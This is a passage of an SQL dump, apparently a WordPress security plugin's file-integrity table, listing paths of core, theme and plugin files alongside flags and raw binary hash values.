vF~��@f�M','',0,'?'),('�~�Hɐ\"��4vDt','wp-content/themes/accelerate/js/accelerate-slider-setting.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���qAf�X��c3�','8c�p����C��ӶK\\z�߇Y�ڊ)��','',0,'?'),('�����y85���æb�','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʰ���5��[�X���','*b�y��(U,�w�9��-_X��`OB�4�$�','',0,'?'),('����.q�(�yh鋀�','wp-content/themes/nirvana/fonts/opensans-extrabold-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&w8�����ڋ*J�','�\0�X{\0�dfH�Y����\r�\Z���嶱�!�gUa�','',0,'?'),('��CPQ��.��sB�\n','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_nav-vertical-align.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��� C�4��XLk�[','*5�+����m.}Uj�{�%4�&�#�AԚ�','',0,'?'),('����H	|(#`�S5sAi','wp-content/themes/sg-window/genericons/genericons/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�=³zeX*�|��b','Ä@��Pw*\'�0M�\'D�۝c�1��ח�d��','',0,'?'),('����wxn??PM���','wp-content/themes/nirvana/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\'\r<H�J�','\0�ℨ7K)���Po\0oh�Ʒ�N`�M��','',0,'?'),('��l�3.	XN�','wp-includes/Requests/Exception/HTTP/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�\r�o��k3��1�','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('��S���%��,�D�CQ','wp-content/plugins/unyson/framework/includes/option-types/multi-upload/static/css/any-files.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	vi�o�K8�q�(n�','�b�dJ�Ln�����L�A��O����t�)��D�','',0,'?'),('��7�qx�����Oj','wp-content/plugins/contact-form-7/languages/contact-form-7-el.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͏�L�0�@һ��\nR>','\n�I�|��x�辕��_���x�SiZvuP','',0,'?'),('����PQ�E|E}7+','wp-admin/includes/class-wp-filesystem-ftpsockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3!�z����]EZٵ�','��\')4���o����o�ū�5�+ո2�u2�F','',0,'?'),('��%��h�ɤ��V�','wp-content/themes/morfeu/loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�v\n�	O<[�uz��','Z��cS�7:�\Z��;������riʹçٌ�','',0,'?'),('��U���$�\\*�1^�S�','wp-includes/js/jquery/ui/effect-clip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��=�����:�	s','��tw�:��o,�u3Mxm���x�H ��gC��','',0,'?'),('��/�BZ���S�6D�d','wp-content/themes/hueman/option-tree/languages/option-tree-et.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�d��7��A','��L�\rqGW�0�`�\n�Ōy篼dO��ֵ��l�z','',0,'?'),('���\rw2����:�c1r','wp-content/themes/wen-business/third-party/bootstrap/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']SW�7��:[�Ү�B','z��ܓ=�gRȯu�*2�����oO:i`\n�̀X','',0,'?'),('����3%;|Z�fz�p','wp-content/themes/hueman/option-tree/includes/ot-functions-option-types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�A�������a��j�','�PK�<��vnq��.�P����C�+��񤃡��-','',0,'?'),('��ݡ����]���do�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.br.php',0,'2A��I����{�','2A��I����{�','�[M���p�w�\'&�Z��+��Ɏ��zQ3��','',0,'?'),('��k��|\'�#��K�','wp-content/themes/point/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*\rѤ�c\nl��','e�A��\n��s(����(wCnt�NԱS�','',0,'?'),('����P�J�t��1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wU ��ې6M�\\�8','<����\0�\rIB=\"�P8D�\"�����L~�I[','',0,'?'),('����_�� �\0*�O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"b�V\"�)����:��','��N#�>�7HF�$`j,�;\r}�\"Yl����]','',0,'?'),('��P\Z��/���l%�','wp-includes/js/jquery/jquery.hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','┃��&�݋\rFư��',']���!G��3����[#�:L�\r:��v�C>','',0,'?'),('�\0� ��k~��U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zb �4ǘ�dHk@Zz2','���^5��-�&�8%|�mLURK�(.[(��','',0,'?'),('���\Z�O(5I�v$\\','wp-content/plugins/unyson/framework/static/js/backend-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�υ&����;��>�`','מ�{!�)�jZ%1�[��U��7r���H�G�\r�','',0,'?'),('�|oxJ$�M�H�|2�','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ko.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�;z���Tv�~�k�','�=�n��Q��$��\0F(�\"�if��O�Æ�Zc','',0,'?'),('�\n%f[!aE�r�tg�i','wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('��Ey�a?\rB�&�:','wp-content/themes/aqueduct/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8e���*#�Nc��','� �^{��<9��q��\"E��T@(�2ܢ���','',0,'?'),('�\"��1Q�s���߷-�','wp-content/themes/mh-magazine-lite/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ہ-�p�莈�D�ɢ~�','��FTM�߇�E�7y6&<-���5]��|�VQ','',0,'?'),('�&�S짿o�$�0�n','wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.�����C#��VZ','s�\Z%���[�g�\n{{!�hȕ<�nña��o','',0,'?'),('�\'P��T]�	�6�~�','wp-content/plugins/akismet/_inc/img/logo-full-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^K��-^��>A�s{�','�%>��:1��W��R����ͩ��Q�i��~�^G','',0,'?'),('�G�|$p֠+(�','wp-admin/js/tags-box.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֙`�\0�c��^Gy���+','���i\'3�%�ື&��~���9Q)-���','',0,'?'),('�P�\0ޣ�}�8�','wp-content/themes/nirvana/fonts/sourcesanspro-extralight-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>��g~c�\0O\nt','!�Ą��g^=c9L��ճ�Th5�X�;y^EsU�','',0,'?'),('�Q����ԁ�2�7u�L','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���3y����1��','	}��N�	<�v���B�S%�s\\���S�','',0,'?'),('�R��B�p��m�Z�;','wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D������D��U��','T�a���{�.^�-�ٖғ�N���V[<`�','',0,'?'),('�Z�0��{額Q��','wp-content/plugins/spam-captcha/core/lang/SL_framework-bg_BG.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!%�E���&\'o0','�ۼ��f���H��I�6EI�LQ���S�','',0,'?'),('�oIf=\r+�t��[�6A','wp-content/plugins/wp-date-remover/public/partials/wp-date-remover-public-display.php',0,'눋��.�~����','눋��.�~����','����u�g�E��`k�D����T��)','',0,'?'),('�o�j����y��V','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gԌ�p�P�Ig[=��','�V���!�ޟ��ƚ_z�=�|�yaX�ȏ�','',0,'?'),('��+Q���KQ�c� ','wp-content/themes/illdy/layout/images/front-page/front-page-latest-news-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CI?�<-n`�u��?�','������\0k��Iִ\n�L��v��^�d�`','',0,'?'),('��Ca�s�]��n�/��','wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��\Z/Ҏw�=y\n','\n�ꂩ��Q���o�9�+1ϭ\\n���Q�','',0,'?'),('��Ѻ�\"�P5��^U�\Zi','wp-admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�	Ki\Zb+GZ��B','\r9�cgfĊ�T�v��S(�9IE�$�pH��','',0,'?'),('��m���z4�L��K','wp-admin/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('����A�G,��<���','wp-includes/js/jquery/ui/effect-fade.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('��7���#���a&�','wp-content/themes/skt-construction-lite/images/sktskill.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D)U)��`_0��>�	U','ٮC^y������E}?e%0l�d��Lj�*;ࡏ','',0,'?'),('�ԥ��5����R�F.','wp-content/plugins/spam-captcha/lang/spam_captcha-it_IT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}E���d׸��I',';�-���K���\\*�{vn7�T�O�0v]','',0,'?'),('����n\0D,����;R','wp-content/plugins/wordfence/js/jquery.dataTables.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\�� �͕�h�','v�Ao;�uD�3$�WB95�_\"��� �','',0,'?'),('���t͕T���X','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��{����3��iQ�','��[\";�;L�����j�2y�6J7�*(d�L','',0,'?'),('��5p��V�x#	Xn�C','wp-content/themes/hueman/languages/ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b1W���\\ �����','�P�B�3(�d���}x�У9��jD�2ʚR','',0,'?'),('��>�Hw�!�Fn�)�L','wp-content/themes/vega/sample/images/featured-image-9.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0���#\0�ߎs[�S','���i9�•~1�lTƝ`%���X�#�ߗa�>��','',0,'?'),('��)]�]Cx��0b8�','wp-content/themes/illdy/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n��M��߈bK%{ʅ�','m}�]`��[�T���U\\dP�y�f�J]?R�X��','',0,'?'),('��~\ngQt\\�agh','wp-content/themes/supernews/acmethemes/customizer/custom-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�f�]�Hl�>M','G�0�\r�e&K�ǰ�����G�[�� ����m��','',0,'?'),('���(�oX�QCzn���','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.pro.php',0,'b�U��N,�(8�!�{u.','b�U��N,�(8�!�{u.','�1�,us9�s�E�f ��6������k5��','',0,'?'),('�����հ	̋�Ȳ�S','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�Ƚ� ����\\E','��\\�	����O��JpF�>Q�� �?��lgi���.','',0,'?'),('�fGOK��,.ߙ�1�','wp-content/plugins/contact-form-7/languages/contact-form-7-ta_IN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��g�����/5UB�','{��B��?��4&�\Zju�\Zd3v0��XKY[i;','',0,'?'),('� �n�$��q��^qf��','wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����:ѷ&����(�','�l�1�Hq�.�2�x��󢾉$�Y�\Z8�','',0,'?'),('� ��\'��M��E�x��','wp-content/themes/vega/sample/images/featured-image-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}hl����ߟ��7','���^?��wN��]F�07	N�����Y�','',0,'?'),('�\"Kg�[\"�8:b�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_panels.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e\r����on��','i8�~�0�,�{F���FS�,�>��Bu','',0,'?'),('�\'^�D��IG�1��!','wp-includes/ms-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�Ҡ�?���h�p�','�&{��%��>g��LK>��C�2�)��  lC�','',0,'?'),('�*T�u\r�����~�m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����G�v�7Mk̩x�','\'s�)k2x\Z��[b�\'{���W$���a','',0,'?'),('�1l<� t~L�Uw�','wp-includes/class-wp-locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('�6\nO�@��<�s,�q�}','wp-content/themes/supernews/assets/library/Font-Awesome/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!p���w���&h','X�\n}�l�//���C��;N�YTV�|t]Yb��','',0,'?'),('�E-j��1j��\r�E�','wp-includes/registration-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('�F�n�|�⩕P��,�','wp-content/themes/relia/inc/js/wow.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/���=�1','Pl|X	oa�I9�(��Ӣ��4�CI336����B','',0,'?'),('�]oM�se��J4�','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���h5��\rxܖN','6y\Zu�υ;�	�0�~�rs1J�9��X���J���','',0,'?'),('�]�m��5{�)��k','wp-content/themes/hueman/assets/front/img/demo/6-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Anτ�$��Q���I','��	�=�-}(�����P����Q�b','',0,'?'),('�f ��r�p�(��p�$�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('�g�K�;�qF�VI}�Q�','wp-includes/Requests/Exception/HTTP/416.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�N9�ɪ�a�Dx�','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�ir�u�5������','wp-content/themes/twentytwenty/assets/js/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��u!V�Qi�N5C]�','�DM�u��E�Q[���csF�f��[С�','',0,'?'),('�w��3̮�\ZM	p���','wp-content/themes/relia/inc/css/slicknav.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʖ��%�5��t�I','�ƕ�nYЩ�y��ym�o��.x%����E�M�','',0,'?'),('�~\Zc�|��jg) D^','wp-content/themes/accelerate/inc/functions.php',0,'�����dEw�参9��','�����dEw�参9��','Z�;�2�<��y�&��̧�b�I̶]�?̙/x\'','',0,'?'),('�������<�x�B�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���xqE̜$�b0^�s','T\0>�t�d��ը&\Z4qɢ���A :�C�C��Q','',0,'?'),('��e�-��Rȉ���L:�','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�Z��O�;�m�#�','�v�̀��O��=��n��u�#�}��զ`�4�W�','',0,'?'),('���8���ՠ�)j,z','wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB-���L\'�g�Aq','vɘ(�f]A��?p�AR\Za��Ɓ& A9\r[��2','',0,'?'),('���K�v&�-t���y','wp-content/themes/wen-business/inc/customizer/partials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��20� �G��','��~H����H0�vj�^��0-\\�9ǀ�+','',0,'?'),('��w�{�n\"n7�W��\Z','wp-content/plugins/unyson/framework/includes/container-types/popup/class-fw-container-type-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oա+@V*Qﻰ=�','�vb�e�xB!�����YG7\"I�ÝP��*','',0,'?'),('����y�4��98_u<','wp-content/themes/travelify/library/panel/images/no-sidebar-fullwidth.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i ����)�|?��','��aB�D!��0\n�j���h\06�\ZAӫ,#f��','',0,'?'),('���h���x��%~\0�','wp-content/themes/hueman/assets/front/js/_parts/_main_userxp.part.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�����?5�8�pJ','�\"1V����^��	k5e�:\03�L/��','',0,'?'),('���51Z�1��7t��94','wp-content/themes/tortuga/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���lV-��e��D��','J��a$���s��F%�yJ-:�v�D:w1Z����','',0,'?'),('�ãg��]S��Pܝ','wp-content/themes/nirvana/fonts/ubuntu-l-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��Y�E!�U~3�','ԘA�JӇ�,����xdR�&{:}Zz@Q���','',0,'?'),('�┲����X��?w\'��','wp-content/themes/mh-magazine-lite/js/css3-mediaqueries_src.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}ݥ,E�B?..3ʨ','��Ɔ�x�6��t�L��)k;��4Y*f��\"���','',0,'?'),('��6D�:|g�(�\\FL�','wp-content/themes/sg-window/content-jetpack-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'>�U�>s�h���','�x��톕��Dn	O���s�j�9)��0�k$\r','',0,'?'),('��p?E^�@�\'��PE�','wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��7�;oh�hlm��','m7��y턎�P=S߁��&2h�~�De�\\U+','',0,'?'),('��>i�>C�.�|#�q','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4�k�q¸�f&','<S�H>�x�Ɂ����9�|f2�Qν���mF','',0,'?'),('������U�\\��a�E','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��ͱ��r0��؅=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('�B����!��vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zz�#uv��\0���','��}���|IR€�v�J�%-�/\n�V���','',0,'?'),('�\'�����mo쪁','wp-content/themes/travelify/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SK�*MC����k�)&','��]-�Sh��ˤ�68&\r��NI�\ra�&','',0,'?'),('�+�i�p�ZӶtB','wp-content/themes/twentytwentyone/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��Q�H�������','�g6G b��Ѓ����U��G#���aY��eD','',0,'?'),('�<��(��*A]�O�','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>jPr�ӱ�;Q�u','Щ�p�M&�v�š�)a�t<��B��\n����D��','',0,'?'),('�D��d.P˴{-yo�g','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�f�uֺg-g\0C�=v','�N<\r�;��d�*��8+)�\ZbO?�0��E���','',0,'?'),('�I|�K9�(�{s�X','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����\0���\Z�̿�','|�?b~����ڬ��(�ʹ׺;l�G9��','',0,'?'),('�N\"�,�_�	3���B�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php',0,'�r����ȂȬ���','�r����ȂȬ���','t�>b2>�/�:v8R\"�\0 &\'�&��cO	%(�','',0,'?'),('�R���&�F��� .��]','wp-content/themes/fabulous-fluid/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԯp}t���ؗP��','�D�3�ՈL��˒}�fіZy,h�F���oR�','',0,'?'),('�Xค/�[�@A�12','wp-content/themes/square/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V%���W\n$`\"��/c�','��G��ܷ�B�^��#0�Z�8�;���Q���','',0,'?'),('�bv��E��H���΄','wp-includes/js/wp-lists.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(��|ګ��j�8�f�','bQ�}ί��v7��H���]�T\n���H�\\\01','',0,'?'),('�f�?H�����024�','wp-content/plugins/unyson/framework/includes/option-types/switch/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��,$j�a��vx��','8Ñk��l�[F\\GOR�)9��#��q2','',0,'?'),('�hS����:���`','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('����+)-�(OS/V�8','wp-content/themes/nirvana/fonts/ubuntu-b-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,9e�9�-���M��/�','z�}i�~��\0p�M=�>�K8�@=z��PN�Z�','',0,'?'),('������|	?���OX','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-permalinks.php',0,'�͇7Ż�������','�͇7Ż�������','�e4�ptt���$Mn��$�GM�<$��R�J:O','',0,'?'),('����C�� g3���g','wp-content/themes/hueman/languages/pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�|Ժ�<�~]��','���K��ȷwǿ��< ���*�o�	�*8$Y','',0,'?'),('��/��un�B���','wp-content/themes/supernews/assets/library/html5shiv/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ި஄UPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('�����<��s��B9ǫg','wp-content/themes/accelerate/inc/admin/meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%�Up�^R�_�]�','5�sK�Α�-�ǪIc�Lƻ�(^���[��p�','',0,'?'),('���@��[�D�V.F$�@','wp-content/themes/travelify/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oԆ*b��[�c�sg�$','��L/�Qv�\n��8\n�����+<E�ğ⮙','',0,'?'),('��.Y���G�ĶGO&','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.nz.php',0,'�r�id�0{]/��	�','�r�id�0{]/��	�','W�o��\"�P���R3>��QD�����P2F��\\','',0,'?'),('���c�l�\\���5e','wp-content/themes/hueman/functions/czr/controls/class-layout-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�FNT��т�	�','�X���@���p6�gZ�P�x�	$�gP�����','',0,'?'),('��GSP7���׀\"0�','wp-content/themes/relia/inc/images/camera_skins.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D#K!��k1��G�黾�','eyJm/o\ZA`�}C��R�U۴�I���I���','',0,'?'),('�̸�1�b\\���c��','wp-content/themes/nirvana/admin/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�\r�sv�R�̪','�\Z���ӫfq���+RX�%,\0�t��U��]��','',0,'?'),('�������8�Zҹ$�','wp-content/themes/hueman/assets/czr/js/czr-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��|����H\Z��u��','����ӄ~a��(b��/E�/+��FX�a����','',0,'?'),('���&��N�,���6P','wp-admin/images/icons32-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*04�G4F�	&Z�i}\"','�.a�}��hw�6�WEʭ�(3�Jӭ�9�E�','',0,'?'),('��v��#q���ȃ�','wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EOxٕX�2떭؃','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('��Z:d�I�l�}\\\n�','wp-content/themes/accelerate/inc/header-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U%If�W�f��a�ܱE','�9$ٚ{2��Se�,x�n���wģR�� q��','',0,'?'),('��W31��N���gפ��','wp-includes/js/dist/vendor/react.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'),('��x[�e��>M�','wp-admin/includes/edit-tag-messages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m-I�f3�f\\Z��','u�-h�yjL��!z�V���-1�nyFY�Ý�&�','',0,'?'),('�������1�!��N','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�*�,�4+�����','wp-content/plugins/dw-social-share/screenshot-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�`�0��J\n=#�','��&�7(2z�{��(�%m��J�*,}i��j','',0,'?'),('�\r�G,�*9?��z�','wp-content/themes/morfeu/assets/sass/odin/_core.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���y �R�*��+�(+�','�z+�7�\'��&�9�Ld(sڂ<��,A��볲�v\Z','',0,'?'),('�%�&��}p\\?ہ','wp-content/plugins/contact-form-7/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��[���\'��T','��ѽ �֨�C��o�9S�x�)��gk��p','',0,'?'),('�*�]í����7�>�I�','wp-content/themes/clean-magazine/js/source/clean-magazine-scrollup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a�YYc�[��','�T�~F���#�6�8B�͗���6.Lj�','',0,'?'),('�8]�;�/���\\bY0�','wp-content/themes/nirvana/images/nivoslider/bullets.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�5�M�Z:��W<ݐ','I�H�7 R�����*ő�{���Ϭ��fC�BEC','',0,'?'),('�9N�E��Y��5d�7','wp-content/themes/relia/inc/js/stellar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y����&�8o~0Wz�','vH�DVH��AIg��̒��S��Hn��w�n5','',0,'?'),('�:�}�G��AS�E���','wp-content/plugins/unyson/framework/extensions/update/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Z�%�ۿ��t\r��R','�T�\\zs3.���פ!��h�{�Cq2�\r�','',0,'?'),('�=~�sI�/fX��f\"','wp-content/themes/precious-lite/content-home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)��f&���Y��x�9O','6p~�l����zL���B6�#��̷,��B��}','',0,'?'),('�O�Jf�b����G*��','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/archiver/class-ai1wm-archiver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\?��D%C���!�1��','�´Poڲ�6����s�����\"٤2Ni��','',0,'?'),('�a�<��t!j�j��s��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hr.js',0,'�c�4+�Y6��%�T�\r�','�c�4+�Y6��%�T�\r�','\r!wW�V�Û�JN׈��=n�*9���֮��[','',0,'?'),('�q�h���Bc�92��','wp-admin/network/site-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bh@�Uj՟���G��\'{','9;#���l+��9���\"��p�LŢ�ۈ�|','',0,'?'),('�s9~�6-��ޑ','wp-content/plugins/wordpress-seo/admin/recalculate/class-recalculate-posts.php',0,'��tqU�K���@a','��tqU�K���@a','����\rB�O¦�C�\"(&��+��U�����C','',0,'?'),('�u���ݠ�:���+R�'